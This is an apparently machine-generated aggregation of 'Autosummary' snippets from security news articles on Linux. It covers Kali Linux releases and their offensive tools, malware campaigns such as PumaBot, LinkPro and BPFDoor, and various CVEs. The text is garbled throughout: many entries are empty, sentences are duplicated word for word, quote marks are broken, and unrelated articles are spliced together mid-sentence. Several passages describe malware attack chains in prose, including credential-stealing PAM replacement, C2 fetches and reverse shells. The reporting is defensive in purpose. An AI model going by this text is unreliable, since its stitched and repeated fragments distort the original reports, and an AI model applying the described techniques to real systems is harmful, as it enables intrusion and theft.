Autosummary:
This time, we"re getting three new additions: bpf-linker - Simple BPF static linker - Simple BPF static linker evil-winrm-py - Python-based tool for executing commands on remote Windows machines using the WinRM - Python-based tool for executing commands on remote Windows machines using the WinRM hexstrike-ai - MCP server that lets AI agents autonomously run tools Desktop environment updates Kali Linux 2025.4 brings many new updates to its desktop environments, including Gnome 49, KDE Plasma, and Xfce. "Autosummary:
To that end, messaging apps like WhatsApp, Telegram, Snapchat, Arattai, Sharechat, Josh, JioChat, and Signal that use an Indian mobile number for uniquely identifying their users, in other words, a telecommunication identifier user entity (TIUE), to comply with the directive within 90 days. "Autosummary:
Within a network, Akira members have been observed using utilities such as nltest, AnyDesk, LogMeIn, Impacket"s wmiexec.py, and VB scripts to perform reconnaissance, spread laterally to other systems, and establish persistence. "Autosummary:
This occurs because the tool uses "call_user_func_array" without validating the function names, allowing execution of dangerous PHP functions such as system, exec, shell_exec, passthru, eval, and more. "Autosummary:
" It"s currently not known how this vulnerability is being exploited and by whom, but it"s assessed to be used as part of a post-exploitation activity to escalate their privileges after obtaining initial access through some other means, such as social engineering, phishing, or exploitation of another vulnerability, Satnam Narang, senior staff research engineer at Tenable, said. "Autosummary:
" Besides using Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel, and SSH-based methods for proxy and tunneling, Curly COMrades has employed various other tools, including a PowerShell script designed for remote command execution and CurlyShell, a previously undocumented ELF binary deployed in the virtual machine that provides a persistent reverse shell. "Autosummary:
"Autosummary:
CurlCat (left) and CurlShell (right) Source: Bitdefender By keeping the malware and its execution inside a virtual machine (VM), the hackers were able to bypass traditional host-based EDR detections, which lacked network inspection capabilities that could detect the threat actor"s command and control (C2) traffic from the VM. "Autosummary:
"Autosummary:
To lure users, the threat actor used typosquatting, a tactic that leverages misspellings or variations of the legitimate names for TypeScript (typed superset of JavaScript), discord.js (Discord bot library), ethers.js (Ethereum JS library), nodemon (auto-restarts Node apps), react-router-dom (React browser router), and zustand (minimal React state manager). "Autosummary:
"System keyrings store credentials for critical services including email clients (Outlook, Thunderbird), cloud storage sync tools (Dropbox, Google Drive, OneDrive), VPN connections (Cisco AnyConnect, OpenVPN), password managers, SSH passphrases, database connection strings, and other applications that integrate with the OS credential store," Socket said. "The official website for Xubuntu, a community-maintained “flavour” of Ubuntu that ships with the Xfce desktop environment, has been compromised to serve Windows malware instead of the Linux distro. The malicious download Reports about a potential compromise began popping up on Reddit on Sunday, with users saying that instead of pointing to .torrent files, the download page served Xubuntu-Safe-Download.zip, containing a suspicious executable (TestCompany.SafeDownloader.exe) and a text file (tos.txt). “The TOS starts with Copyright (c) … More
The post Official Xubuntu website compromised to serve malware appeared first on Help Net Security.
"Autosummary:
The malicious download Reports about a potential compromise began popping up on Reddit on Sunday, with users saying that instead of pointing to .torrent files, the download page served Xubuntu-Safe-Download.zip, containing a suspicious executable (TestCompany.SafeDownloader.exe) and a text file (tos.txt). "Autosummary:
The overall sequence of events unfolds as follows - Install the "Hide" eBPF module, which contains eBPF programs of the Tracepoint and Kretprobe types to hide its processes and network activity If the "Hide" module installation fails, or if it has been disabled, install the shared library "libld.so" in /etc/ld.so.preload If reverse mode is used, install the "Knock" eBPF module, which contains two eBPF programs of the eXpress Data Path (XDP) and Traffic Control (TC) types to ensure that the C2 communication channel is fired only upon the receipt of the magic packet Achieve persistence by setting up a systemd service Execute C2 commands On interruption (SIGHUP, SIGINT, and SIGTERM signals), uninstall the eBPF modules and delete the modified /etc/libld.so and restore it back to its original version To achieve this, LinkPro modifies the "/etc/ld.so.preload" configuration file to specify the path of the libld.so shared library embedded within it with the main objective of concealing various artifacts that could reveal the backdoor"s presence. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
(Disclosed as exploited by Cisco last week) CVE-2025-10035 - Fortra GoAnywhere MFT contains a deserialization of untrusted data vulnerability that allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection. "OffSec has released Kali Linux 2025.3, the most up-to-date version of its popular penetration testing and digital forensics platform. What’s new in Kali Linux 2025.3 Better virtual machine tooling The way Kali builds and ships its VM images has been updated, they improved their scripts and workflows to be more consistent and easier to manage.  Nexmon Wi-Fi support Nexmon is a firmware patch that allows users to enable monitor mode (packet sniffing) and packet … More
The post Kali Linux 2025.3 brings improved virtual machine tooling, 10 new tools appeared first on Help Net Security.
"Autosummary:
"Autosummary:
With this release, we have ten new tools, which are listed below: Caido - The client side of caido (the graphical/desktop aka the main interface) - a web security auditing toolkit - The client side of caido (the graphical/desktop aka the main interface) - a web security auditing toolkit Caido-cli - The server section of caido - a web security auditing toolkit - The server section of caido - a web security auditing toolkit Detect It Easy (DiE) - File type identification - File type identification Gemini CLI - An open-source AI agent that brings the power of Gemini directly into your terminal - An open-source AI agent that brings the power of Gemini directly into your terminal krbrelayx - Kerberos relaying and unconstrained delegation abuse toolkit - Kerberos relaying and unconstrained delegation abuse toolkit ligolo-mp - Multiplayer pivoting solution - Multiplayer pivoting solution llm-tools-nmap - Enables LLMs to perform network discovery and security scanning tasks using the nmap - Enables LLMs to perform network discovery and security scanning tasks using the nmap mcp-kali-server - MCP configuration to connect AI agent to Kali - MCP configuration to connect AI agent to Kali patchleaks - Spots the security fix and provides detailed description so you can validate - or weaponize - it fast - Spots the security fix and provides detailed description so you can validate - or weaponize - it fast vwifi-dkms - Setup "dummy" wifi networks, establishing connections, and disconnecting from them Kali Nethunter and Nexmon updates Nexmon is a firmware Patching Framework for Broadcom and Cypress wi-fi chips that allows you to enable Monitor Mode and Frame Injection. "Autosummary:
Compiled with Go, the Linux version supports a wide range of functions to enable file exfiltration, system enumeration, screenshot capture, persistence through systemd services, and arbitrary command execution - /fs_list, to enumerate directories /fs_get, to exfiltrate files from the host /metrics, to perform system profiling /proc_list, to run the "ps" Linux command /proc_kill, to kill a specific process by passing the PID as input /capture_display, to take screenshots /persist, to establish persistence ZynorRAT"s Windows version is near-identical to its Linux counterpart, while still resorting to Linux-based persistence mechanisms. "Kopia is an open-source backup and restore tool that lets you create encrypted snapshots of your files and store them in cloud storage, on a remote server, on network-attached storage, or on your own computer. It doesn’t create a full image of your machine. Instead, you pick the files and folders you want to back up or restore. Kopia using Google Cloud Storage with pluggable encryption and compression Kopia comes with both a command-line interface … More
The post Kopia: Open-source encrypted backup tool for Windows, macOS, Linux appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Sample of a decoy PDF used in the attacks Source: CloudSEK In addition to the manipulation of the "Exec=" field to run a sequence of shell commands, the attackers also added fields like "Terminal=false" to hide the terminal window from the user, and "X-GNOME-Autostart-enabled=true" to run the file at every login. "Autosummary:
"Autosummary:
The backdoor was stealthily injected by a long-time project contributor named "Jia Tan," and shipped in official Linux distro packages like Debian, Fedora, OpenSUSE, and Red Hat, making it one of the most severe software supply chain compromises last year. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
" This is added on top of what Unit 42 documented previously, including privilege-aware execution logic, use of benign filenames, hooking libc functions, use of a fake logs directory, C2 connections over TLS, unique hashes for each sample, and the existence of a "kill switch. "Autosummary:
It also performs network hardening and proxy evasion, overwriting /etc/resolv.conf to use Cloudflare and Google DNS, locking it using the chattr +i command, flushing iptables, resetting proxy variables, and using a custom module to brute-force working proxies via curl, wget, and raw TCP checks. "Autosummary:
"Autosummary:
The packages were named "librewolf-fix-bin", "firefox-patch-bin", and "zen-browser-patched-bin," and were uploaded by the same user, "danikpapas," on July 16. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Stealthy backdoor found hiding in SOHO devices running Linux SecurityScorecard’s STRIKE team has uncovered a network of compromised small office and home office (SOHO) devices they’re calling LapDogs. High-risk WinRAR RCE vulnerability patched, update quickly! (CVE-2025-6218) A recently patched directory traversal vulnerability (CVE-2025-6218) in WinRAR could be leveraged by remote attackers to execute arbitrary code on affected installations. Breaking the … More
The post Week in review: Backdoor found in SOHO devices running Linux, high-risk WinRAR RCE flaw patched appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: June 2025 Here’s a look at the most interesting products from the past month, featuring releases from: Akamai, AttackIQ, Barracuda Networks, BigID, Bitdefender, Contrast Security, Cymulate, Dashlane, Embed Security, Fortanix, Fortinet, Jumio, Lemony, Malwarebytes, SpecterOps, StackHawk, Stellar Cyber, Sumsub, Thales, Tines, Vanta, and Varonis. Users lack control as major AI platforms share personal info with third parties Some of the most popular generative AI and large language model (LLM) platforms, from companies like Meta, Google, and Microsoft, are collecting sensitive data and sharing it with unknown third parties, leaving users with limited transparency and virtually no control over how their information is stored, used, or shared, according to Incogni. "Autosummary:
" The Linux Foundation is a nonprofit organization that hosts and supports open-source projects such as Linux, Kubernetes, Node.js, PyTorch, and RISC-V. The organization provides neutral governance, legal, operational, and technical support, and the infrastructure required for collaboration, trust, and longevity. "Autosummary:
" The Qualys Threat Research Unit (TRU), which discovered and reported both flaws, has developed proof-of-concept exploits and successfully targeted CVE-2025-6019 to get root privileges on Ubuntu, Debian, Fedora, and openSUSE Leap 15 systems. "Autosummary:
"Kali Linux has long been the go-to operating system for penetration testers and security professionals, and Learning Kali Linux, 2nd Edition by Ric Messier aims to guide readers through its core tools and use cases. This updated edition introduces new material on digital forensics and reverse engineering, while keeping its focus on practical, hands-on learning. It’s written for people who have at least some familiarity with Linux or command-line environments, but it doesn’t assume deep … More
The post Review: Learning Kali Linux, 2nd Edition appeared first on Help Net Security.
"Autosummary:
About the author Ric Messier is an author, consultant, and educator who holds CCSP, GCIH, GSEC, CEH, and CISSP certifications, and has published several books on information security and digital forensics.Topics include network reconnaissance, vulnerability scanning, exploitation, post-exploitation, wireless testing, and web application assessment. "Autosummary:
New tools in Kali Linux 2025.2 This new Kali Linux release also adds 23 new toys to test: azurehound - BloodHound data collector for Microsoft Azure binwalk3 - Firmware Analysis Tool bloodhound-ce-python - Python based ingestor for BloodHound CE bopscrk - Generate smart and powerful wordlists chisel-common-binaries - Prebuilt binaries for chisel crlfuzz - Fast tool to scan CRLF vulnerability written in Go (Submitted by @Arszilla) donut-shellcode - Generates position-independent shellcode from memory and runs them gitxray - Scan GitHub repositories and contributors to collect data (Submitted by @weirdlantern) ldeep - In-depth LDAP enumeration utility ligolo-ng-common-binaries - Prebuilt binaries for Advanced ligolo-ng rubeus - Raw Kerberos interaction and abuses sharphound - BloodHound CE collector tinja - CLI tool for testing web pages for template injection Kali NetHunter Updates Besides a revamped car hacking toolset, Kali Linux 2025.2 introduces wireless injection, de-authentication, and WPA2 handshake capture support for the first smartwatch, the TicWatch Pro 3 (all variants with bcm43436b0 chipset). "OffSec has released Kali Linux 2025.2, the most up-to-date version of the widely used penetration testing and digital forensics platform. KDE Plasma 6.3 in Kali Linux 2025.2 (Source: OffSec) New in Kali Linux 2025.2 As per usual, the newest Kali version comes with new community wallpapers and new versions of the KDE Plasma and GNOME graphical desktop environments. This time around, the Kali Menu is new, as well: it has been reorganized to follow the … More
The post Kali Linux 2025.2 delivers Bloodhound CE, CARsenal, 13 new tools appeared first on Help Net Security.
"Autosummary:
"Autosummary:
This week"s list includes — CVE-2025-20286 (Cisco Identity Services Engine), CVE-2025-49113 (Roundcube), CVE-2025-5419 (Google Chrome), CVE-2025-21479, CVE-2025-21480, CVE-2025-27038 (Qualcomm), CVE-2025-37093 (HPE StoreOnce), CVE-2025-48866 (ModSecurity WAF), CVE-2025-25022 (IBM QRadar Suite), CVE-2025-22243 (VMware NSX Manager), CVE‑2025‑24364, CVE‑2025‑24365 (Vaultwarden), and CVE-2024-53298 (Dell PowerScale OneFS).Also known by the aliases, "dendimirror," "alinchok," "ghackihg," "makc1901," "navi_ghacking," and "bloodzz.fenix," Rudometov is believed to have fled from the Luhansk region of Ukraine where he was born to Krasnodar, Russia, following the Russian invasion of Ukraine in February 2022.Also known by the aliases, "dendimirror," "alinchok," "ghackihg," "makc1901," "navi_ghacking," and "bloodzz.fenix," Rudometov is believed to have fled from the Luhansk region of Ukraine where he was born to Krasnodar, Russia, following the Russian invasion of Ukraine in February 2022.The groups, overseen by Taiwan"s Information, Communications and Electronic Force Command (ICEFOM), include APT-C-01 (aka Poison Vine or GreenSpot), APT-C-62 (aka Viola Tricolor), APT-C-64 (aka Anonymous 64), APT-C-65 (aka Neon Pothos), and APT-C-67 (aka Ursa).The groups, overseen by Taiwan"s Information, Communications and Electronic Force Command (ICEFOM), include APT-C-01 (aka Poison Vine or GreenSpot), APT-C-62 (aka Viola Tricolor), APT-C-64 (aka Anonymous 64), APT-C-65 (aka Neon Pothos), and APT-C-67 (aka Ursa)."Their primary goal is to steal and sell sensitive intelligence, including important diplomatic policies, defense technology, cutting-edge scientific achievements, and economic data, to anti-China forces abroad," CVERC claimed in a report titled Operation Futile."Their primary goal is to steal and sell sensitive intelligence, including important diplomatic policies, defense technology, cutting-edge scientific achievements, and economic data, to anti-China forces abroad," CVERC claimed in a report titled Operation Futile.According to ReliaQuest, Lumma accounted for nearly 92% of Russian Market credential log alerts in Q4 2024, putting it way ahead of its peers RedLine, StealC, Raccoon, Vidar, RisePro, and a new stealer referred to as Acreed.According to ReliaQuest, Lumma accounted for nearly 92% of Russian Market credential log alerts in Q4 2024, putting it way ahead of its peers RedLine, StealC, Raccoon, Vidar, RisePro, and a new stealer referred to as Acreed."Over the past several months and years, we have observed a pattern of compliance failures, unmet improvement commitments, and the absence of tangible, measurable progress in response to publicly disclosed incident reports," Google said."Over the past several months and years, we have observed a pattern of compliance failures, unmet improvement commitments, and the absence of tangible, measurable progress in response to publicly disclosed incident reports," Google said. — China"s National Computer Virus Emergency Response Center (CVERC) has accused Taiwan"s Democratic Progressive Party (DPP) of sponsoring five advanced persistent threat (APT) groups to conduct cyber espionage attacks against government and public service entities, research institutions, universities, defense technology and industry entities, and foreign affairs agencies located in mainland china."During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data," it said."During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data," it said.Intel 471, in a report last week, highlighted an increase in Android malware incorporating hidden virtual network computing (HVNC), keylogging, and remote control functionalities, and a decrease in web injects.China Accuses Taiwan of Running 5 APT Groups with U.S. Help — China"s National Computer Virus Emergency Response Center (CVERC) has accused Taiwan"s Democratic Progressive Party (DPP) of sponsoring five advanced persistent threat (APT) groups to conduct cyber espionage attacks against government and public service entities, research institutions, universities, defense technology and industry entities, and foreign affairs agencies located in mainland china." — Threat hunters have disclosed a new malware campaign that employs cracked software or key generators for legitimate software as lures to distribute a known stealer malware called ViperSoftX, alongside other malware families such as Quasar RAT, PureCrypter, PureHVNC, and a cryptocurrency clipper. "Autosummary:
The new platform "brings together a fragmented ecosystem by bringing together plugins from any source" and "builds security into the supply chain, including improved cryptographic security measures, enhanced browser compatibility checking, and enabling reliance on trusted source security salts. "Autosummary:
It can gather OS and user info, take screenshots, reboot or shut down the system, lock or sign out users (Windows only), browse and manage files (explore, upload, download, delete), and open URLs in the default browser. Chaos RAT enables attackers to manage files, open reverse shells, and proxy network traffic, which are functions useful for spying, stealing data, or setting the stage for ransomware. "Autosummary:
Once installed, the malware connects to an external server and awaits commands that allow it to launch reverse shells, upload/download/delete files, enumerate files and directories, take screenshots, gather system information, lock/restart/shutdown the machine, and open arbitrary URLs. "Autosummary:
A race condition in systemd-coredump that allows an attacker to force a SUID process to crash and replace it with a non-SUID binary to access the original"s privileged process coredump, allowing the attacker to read sensitive data, such as /etc/shadow content, loaded by the original process SUID, short for Set User ID, is a special file permission that allows a user to execute a program with the privileges of its owner, rather than their own permissions. "Autosummary:
The first (CVE-2025-5054) affects Ubuntu’s core-dump handler, Apport, and the second (CVE-2025-4598) targets systemd-coredump, which is the default core-dump handler on Red Hat Enterprise Linux 9 and the recently released 10, as well as on Fedora. "Autosummary:
Darktrace said its analysis of the campaign uncovered other related binaries that are said to be deployed as part of a broader campaign - ddaemon, a Go-based backdoor which is retrieve the binary "networkxm" into "/usr/src/bao/networkxm" and execute the shell script "installx.sh" networkxm, an SSH brute-force tool that functions similar to the botnet"s initial stage by fetching a password list from a C2 server and attempts to connect via SSH across a list of target IP addresses installx.sh, which is used to retrieve another shell script "jc.sh" from "1.lusyn[.]xyz," grant it read, write, and execute permissions for all access levels, run the script, and clear bash history jc.sh, which is configured to download a malicious "pam_unix.so" file from an external server and use it to replace the legitimate counterpart installed on the machine, as well as retrieve and run another binary named "1" from the same server pam_unix.so, which acts as a rootkit that steals credentials by intercepting successful logins and writing them to the file "/usr/bin/con.txt" 1, which is used to monitor for the file "con.txt" being written or moved to "/usr/bin/" and then exfiltrate its contents to the same server Given that the SSH brute-force capabilities of the botnet malware lends it worm-like capabilities, users are required to keep an eye out for anomalous SSH login activity, particularly failed login attempts, audit systemd services regularly, review authorized_keys files for the presence of unknown SSH keys, apply strict firewall rules to limit exposure, and filter HTTP requests with non-standard headers, such as X-API-KEY: jieruidashabi. "Autosummary:
New PumaBot targets Linux IoT surveillance devices Pierluigi Paganini May 28, 2025 May 28, 2025 PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto.“While it does not appear to propagate automatically like a traditional worm, it does maintain worm-like behavior by brute-forcing targets, suggesting a semi-automated botnet campaign focused on device compromise and long-term access.” "Microsoft has officially open-sourced the Windows Subsystem for Linux (WSL), closing the very first issue ever filed on the Microsoft/WSL GitHub repository: “Will this be open source?” WSL allows developers to run unmodified Linux command-line tools, utilities, and applications directly on Windows, without the overhead of a traditional virtual machine or dual-boot setup.
The post The Windows Subsystem for Linux goes open source appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"While regular users received the bulk of authentication attempts (50,214), admin accounts and shared mailboxes were targeted at a specific pattern, with admin accounts receiving 9,847 attempts across 432 IPs over 8 hours, suggesting an average of 22.79 attempts per IP and a velocity of 1,230.87 attempts per hour," the company said. "Red Hat Enterprise Linux 10 provides a strategic and intelligent backbone for enterprise IT to navigate complexity, accelerate innovation and build a more secure computing foundation for the future. As enterprise IT grapples with the proliferation of hybrid environments and the imperative to integrate AI workloads, the need for an intelligent, resilient and durable operating system has never been greater. Red Hat Enterprise Linux 10 rises to this challenge, delivering a platform engineered for agility, … More
The post Red Hat Enterprise Linux 10 helps mitigate future quantum-based threats appeared first on Help Net Security.
"Autosummary:
With intelligent features using gen AI, unified hybrid cloud management through image mode and a proactive approach to security with post-quantum cryptography, Red Hat Enterprise Linux 10 provides the robust and innovative foundation needed to thrive in the era of hybrid cloud and AI,” said Gunnar Hellekson, VP and GM, Red Hat Enterprise Linux, Red Hat. Key additions in Red Hat Enterprise Linux 10 include capabilities and innovations to: Get ready for the hybrid cloud, today with pre-tuned, fully supported and ready-to-run Red Hat Enterprise Linux images across AWS, Google Cloud and Microsoft Azure. "Autosummary:
"Autosummary:
"Autosummary:
oniux torsocks Standalone application Requires running Tor daemon Uses Linux namespaces Uses an ld.so preload hack Works on all applications Only works on applications making system calls through libc Malicious application cannot leak Malicious application can leak by making a system call through raw assembly Linux only Cross-platform New and experimental Battle-proven for over 15 years Uses Arti as its engine Uses CTor as its engine Written in Rust Written in C Despite the obvious advantages of Oniux, Tor highlights that the project is still experimental and hasn"t been tested extensively under multiple conditions and scenarios. "The Nobara Project has released a new version of its Linux distribution, bringing updated packages, performance improvements, and a few visual tweaks aimed at making life easier for users who want a system that works well out of the box. Nobara Linux 42 includes changes that will be especially useful for anyone who wants a preconfigured Fedora-based desktop with minimal setup. Nobara is a custom version of Fedora Linux that includes extra drivers, packages, and … More
The post Nobara Linux 42 brings performance boost and better hardware support appeared first on Help Net Security.
"Autosummary:
For people who want a ready-to-use desktop for gaming, media work, or daily tasks, that can mean a lot of extra setup.The Nobara Project has released a new version of its Linux distribution, bringing updated packages, performance improvements, and a few visual tweaks aimed at making life easier for users who want a system that works well out of the box. "Autosummary:
"Autosummary:
Instructions for Linux users Source: Hunt.io The command drops the "mapeal.sh" payload on the target"s system, which, according to Hunt.io, does not perform any malicious actions in its current version, limited to fetching a JPEG image from the attacker"s server. "Autosummary:
"Autosummary:
Malicious Go Modules designed to wipe Linux systems Pierluigi Paganini May 04, 2025 May 04, 2025 Researchers found 3 malicious Go modules with hidden code that can download payloads to wipe a Linux system’s main disk, making it unbootable. "Autosummary:
The packages, which have since been removed, are as follows - cfc-bsb (2,913 downloads) coffin2022 (6,571 downloads) coffin-codes-2022 (18,126 downloads) coffin-codes-net (6,144 downloads) coffin-codes-net2 (6,238 downloads) coffin-codes-pro (9,012 downloads) coffin-grave (6,544 downloads) The packages use hard-coded Gmail account credentials to sign-in to the service"s SMTP server and send a message to another Gmail address to signal a successful compromise. "Autosummary:
“Today, many security vendors are shifting towards building eBPF-based agents, largely because eBPF is considered “safe” for use in products like EDR and CWPP.” concludes the report. "Peridio, a platform for building and maintaining advanced embedded products, has launched Avocado OS, an open-source embedded Linux distribution made to simplify the way developers build complex embedded systems. Avocado OS focuses on delivering a smooth developer experience while offering security, reliability, and consistent performance. A new answer to an old problem Teams building with traditional Embedded Linux often face a tough choice. They must pick between developer-friendly systems that move fast, or production systems … More
The post Avocado OS: Open-source Linux platform for embedded systems appeared first on Help Net Security.
"Autosummary:
Avocado OS delivers critical capabilities without forcing tradeoffs: immutable and deterministic runtimes, fault-tolerance, modular update mechanisms, simplified secure boot implementation, full disk encryption, and boot modes for manufacturing, recovery, and testing. "Autosummary:
" To avoid experiencing these update issues, OffSec advises users to manually download and install the new repository signing key using the following command: sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg OffSec also provides details on how to check that the checksum of the file matches and view the contents of the updated keyring. "Autosummary:
io_uring task submission and completion rings Source: Donald Hunter The problem, according to ARMO, arises from the fact that most security tools monitor for suspicious syscalls and hooking (like "ptrace" or "seccomp"), completely ignoring anything that involves the io_ring, creating a very dangerous blindspot. "Autosummary:
" "On the one hand, you need visibility into system calls; on the other, you need access to kernel structures and sufficient context to detect threats effectively," Amit Schendel, Head of Security Research at ARMO, said. "Oracle has released version 8 of its Unbreakable Enterprise Kernel (UEK), a custom Linux kernel built for Oracle Linux. UEK 8 includes updates to memory management, better file system support, faster networking, and improvements for specific hardware platforms. It also pulls in changes from the wider Linux community. UEK 8 is designed to handle heavy workloads. It builds on the combination of Oracle Linux and UEK to support large enterprise systems. That includes setups using … More
The post Oracle releases Unbreakable Enterprise Kernel 8 (UEK 8) appeared first on Help Net Security.
"Autosummary:
It’s based on the latest long-term stable Linux kernel and works on 64-bit Intel, AMD (x86-64), and Arm (aarch64) systems. "Autosummary:
The packages in question are listed below - According to supply chain security firm Socket, the packages are designed to mimic node-telegram-bot-api, a popular Node.js Telegram Bot API with over 100,000 weekly downloads. "Autosummary:
"Autosummary:
In the next step, the controller directs the compromised machine to perform one of the below actions based on the password provided and the command-line options used - Open a reverse shell Redirect new connections to a shell on a specific port, or Confirm the backdoor is active It"s worth pointing out that the password sent by the controller must match one of the hard-coded values in the BPFDoor sample. "Autosummary:
The attacks, the Taiwanese cybersecurity company said, targeted a multitude of sectors spanning nearly 20 different countries such as Austria, Australia, France, Spain, Japan, South Korea, Netherlands, Singapore, Taiwan, the United Arab Emirates, the United Kingdom, and the United States. "Packed with real-world scenarios, hands-on techniques, and insights into widely used tools, the third edition of the bestselling Ultimate Kali Linux Book offers a practical path to learning penetration testing with Kali Linux. About the author Glen D. Singh, a seasoned cybersecurity author and lecturer, brings deep expertise in cybersecurity operations, offensive security tactics, and enterprise networking. He holds an MSc in Cybersecurity and numerous industry certifications. Inside the book One of the best things … More
The post Review: The Ultimate Kali Linux Book, Third Edition appeared first on Help Net Security.
"Autosummary:
About the author Glen D. Singh, a seasoned cybersecurity author and lecturer, brings deep expertise in cybersecurity operations, offensive security tactics, and enterprise networking.Packed with real-world scenarios, hands-on techniques, and insights into widely used tools, the third edition of the bestselling Ultimate Kali Linux Book offers a practical path to learning penetration testing with Kali Linux. "Autosummary:
The vulnerability CVE-2024-53197 (CVSS score of 7.8) resides in the Linux kernel’s ALSA USB-audio driver affecting Extigy and Mbox devices, where incorrect handling of USB configuration data could lead to out-of-bounds memory access. "Autosummary:
For instance, to protect their and their family’s personal information, 47% of people said they “stopped using TikTok,” 45% said they “stopped using X” (formerly Twitter), 44% said they “stopped using Instagram,” and 37% said they “stopped using Facebook.” While 87% of people “support national laws regulating how companies can collect, store, share, or use our personal data,” 60% feel that “we will never have simple, meaningful ways to protect our data.” A full 87% of people “support national laws regulating how companies can collect, store, share, or use our personal data,” while 70% also believe “we will never have simple, meaningful ways to protect our data.” "Autosummary:
"Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis published Tuesday. "Autosummary:
" The disclosure comes weeks after Praetorian detailed several ways a lower-privilege principal can abuse an Azure virtual machine (VM) to gain control over an Azure subscription - Execute commands on an Azure VM associated with an administrative managed identity Log in to an Azure VM associated with an administrative managed identity Attach an existing administrative user-assigned managed identity to an existing Azure VM and execute commands in that VM Create a new Azure VM, attach an existing administrative managed identity to it, and execute commands in that VM by using data plane actions "After obtaining the Owner role for a subscription, an attacker may be able to leverage their broad control over all subscription resources to find a privilege escalation path to the Entra ID tenant," security researchers Andrew Chang and Elgin Lee said. "Autosummary:
Qualys provides technical details for the three bypass methods, which are summarized as follows: Bypass via aa-exec: Users can exploit the aa-exec tool, which allows running programs under specific AppArmor profiles. "Autosummary:
PAM solutions streamline compliance by providing detailed logs of privileged account activities, simplifying the auditing process, and ensuring adherence to standards, laws, and regulations such as the GDPR, PCI DSS, and NIS2.PAM solutions streamline compliance by providing detailed logs of privileged account activities, simplifying the auditing process, and ensuring adherence to standards, laws, and regulations such as the GDPR, PCI DSS, and NIS2.This efficiency leads to increased productivity, as users can access necessary systems promptly without compromising security. Overall, implementing a robust PAM solution not only fortifies your organization"s security against insider threats but also delivers a multitude of benefits that drive operational efficiency, regulatory compliance, and productivity growth.Automating insider threat response With the automation provided by PAM solutions, organizations significantly reduce the time to detect and respond to insider threats, minimizing potential financial, operational, and reputational damage. The consequences of insider threats range from financial losses and reputational damage to severe penalties for non-compliance with critical cybersecurity laws, regulations, and standards like GDPR, NIS2, or HIPAA. "Kali Linux 2025.1a is now available. This release enhances existing features with improvements designed to streamline your experience. 2025 theme refresh Kali Linux 2025.1a introduces an annual theme refresh, maintaining a modern interface. This year’s update debuts a redesigned theme aimed at enhancing the user experience from startup. Users can expect notable visual updates, including an improved boot menu, a refined login screen, and a selection of new desktop wallpapers for both Kali and Kali … More
The post Kali Linux 2025.1a drops with theme refresh, Kali NetHunter updates appeared first on Help Net Security.
"Autosummary:
Samsung Galaxy S9 (Exynos9810 – LineageOS 20/Android 13) Samsung Galaxy S10 (Exynos9820 – LineageOS 21 & LineageOS 22.1) Xiaomi Redmi Note 6 Pro (Android 11) Download Kali Linux 2025.1a is now available to download or upgrade if you’re already running Kali Linux. "Autosummary:
Unfortunately, the team said this release is mostly focused on updates, so only one tool was included this time: hoaxshell - Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell In addition to Hoaxshell, Kali says they upgraded the Kernel version to 6.12. "Autosummary:
Researcher releases free GPU-Based decryptor for Linux Akira ransomware Pierluigi Paganini March 17, 2025 March 17, 2025 A researcher released a free decryptor for Linux Akira ransomware, using GPU power to recover keys through brute force.The researcher analyzed log files, file metadata, and hardware benchmarks to estimate encryption timestamps, making brute-forcing decryption keys more efficient. "Autosummary:
Researcher releases free GPU-Based decryptor for Linux Akira ransomware Pierluigi Paganini March 17, 2025 March 17, 2025 A researcher released a free decryptor for Linux Akira ransomware, using GPU power to recover keys through brute force.The researcher analyzed log files, file metadata, and hardware benchmarks to estimate encryption timestamps, making brute-forcing decryption keys more efficient. "Autosummary:
During the March 2025 Patch Tuesday, Microsoft also patched the following five zero-day vulnerabilities tagged as actively exploited: CVE-2025-24984 - Windows NTFS Information Disclosure Vulnerability CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution Vulnerability CVE-2025-24991 - Windows NTFS Information Disclosure Vulnerability CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability CVE-2025-26633 - Microsoft Management Console Security Feature Bypass Vulnerability Yesterday, CISA added all six zero-days to its Known Exploited Vulnerabilities Catalog, ordering Federal Civilian Executive Branch (FCEB) agencies to secure their systems by April 1st, as required by the Binding Operational Directive (BOD) 22-01. "Autosummary:
"Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-50302 Linux Kernel Use of Uninitialized Resource Vulnerability CVE-2025-22225 VMware ESXi Arbitrary Write Vulnerability CVE-2025-22224 VMware ESXi and Workstation TOCTOU Race Condition Vulnerability CVE-2025-22226 VMware ESXi, Workstation, and Fusion Information Disclosure Vulnerability The first issue, tracked as CVE-2024-50302, was addressed by Google with the release of the Android March 2025 security update. Below are the descriptions for these vulnerabilities: CVE-2025-22224 (CVSS score of 9.3) VMCI heap-overflow vulnerability: the vulnerability is TOCTOU (Time-of-Check Time-of-Use) issue in VMware ESXi, and Workstation that can lead to an out-of-bounds write. "Autosummary:
